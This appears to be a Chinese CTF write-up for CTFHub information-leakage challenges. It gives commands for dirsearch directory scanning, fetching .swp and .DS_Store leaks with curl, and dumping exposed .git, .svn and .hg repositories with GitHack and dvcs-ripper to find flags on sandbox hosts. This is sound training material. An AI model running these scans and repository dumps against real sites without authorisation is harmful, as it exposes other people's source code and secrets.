在gtihub下载dirsearch
在cmd输入命令
python dirsearch.py -u http://challenge-91f1f5e6a791ab02.sandbox.ctfhub.com:10080/ -e *
会扫描出备份文件,下载后,看到flag文件名,在url访问即可得到flag
用dirsearch扫描输入命令
python dirsearch.py -u http://challenge-91f1f5e6a791ab02.sandbox.ctfhub.com:10080/ -e *
找到缓存文件并下载
用记事本打开就能看见flag
或者使用curl也可以
curl http://challenge-c11057ca9f308893.sandbox.ctfhub.com:10080/.index.php.swp
或者使用vim
vim -r index.php.swp
之所以.index.php.swp前面有点,是因为这是隐藏文件
先用dirsearch扫描
找到.DS_Store目录并访问,得到文件,打开,找到藏在里面的txt的文件名用curl访问
curl http://challenge-29d518df22e66c57.sandbox.ctfhub.com:10080/d941f118577f141e83a78b3980372c58.txt
或者直接用url访问,得到flag
githack在https://github.com/BugScanTeam/GitHack 下载
用anaconda安装python2的虚拟环境(上古时代的工具,python3运行出错)
在python2的环境下执行
python GitHack.py http://challenge-b52d7f7ce411807b.sandbox.ctfhub.com:10080/.git/
进入下载目录
执行
git log
发现历史版本
执行命令比较历史版本
git diff 3a79
得到flag
先dirsearch,发现git泄露,用githack下载,用git log检查,没有发现,遂使用git stash list查看存储的工作状态,Stash就是当我们需要放下手头工作时,存储当前工作状态,需要时再用。
执行
git stash pop
发现工作区多了一个txt文件,打开即可得到flag
先用dirsearch发现.svn泄露,在Linux下使用dvcs-ripper,输入
perl rip-svn.pl -v -u http://challenge-6682fc0463d70781.sandbox.ctfhub.com:10080/.svn/
下载文件,按CTRL+H显示隐藏文件,或者用ls -al命令
一般pristine文件夹里包含了整个项目的所有文件备份,检查文件夹,发现flag
sudo apt-get install perl libio-socket-ssl-perl libdbd-sqlite3-perl libclass-dbi-perl libio-all-lwp-perl
sudo apt-get install libparallel-forkmanager-perl libredis-perl libalgorithm-combinatorics-perl
sudo apt-get install cvs subversion git bzr mercurial
git clone https://github.com/kost/dvcs-ripper
在Linux下使用dvcs-ripper,输入
perl rip-hg.pl -v -u http://challenge-db353b7091d919fb.sandbox.ctfhub.com:10080/.hg/
进入store打开fncache发现flag文件名,用url访问即可得到flag